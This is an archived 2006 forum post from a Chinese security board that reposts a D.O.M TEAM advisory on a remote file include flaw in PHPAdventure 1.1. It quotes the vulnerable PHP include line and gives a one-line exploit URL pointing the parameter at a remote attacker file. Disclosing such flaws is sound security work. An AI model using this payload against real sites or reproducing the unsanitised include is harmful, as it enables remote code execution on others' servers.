PHPAdventure 1.1 (ad_main.php) Remote File Include Vulnerability(页 1) - 安全测试代码{ Exploits and Shellcode } - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

pub!1c 2006-11-12 11:57

PHPAdventure 1.1 (ad_main.php) Remote File Include Vulnerability

[code]
*********************************************
D.O.M TEAM
Bug found: HER0
cms: PHPAdventure
type: rfi
risk: High
download:[url]http://prdownloads.sourceforge.net/phpadventure/phpadv11.tar.gz[/url]
contac:16.her0@gmail.com
nota: all the versions of PHPAdventure is affected..
********************************************
line of the code:

<?php
$_stage = 1;
include($_mygamefile);
?>

exploit:
/ad_main.php?_mygamefile=http://evilcode.txt?
****************************************************************
[url]www.domteam.info[/url]

greetz:Sponge Bob,Bob esponja XDDDD...
******************************************************************************************

[/code]

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

PHPAdventure 1.1 (ad_main.php) Remote File Include Vulnerability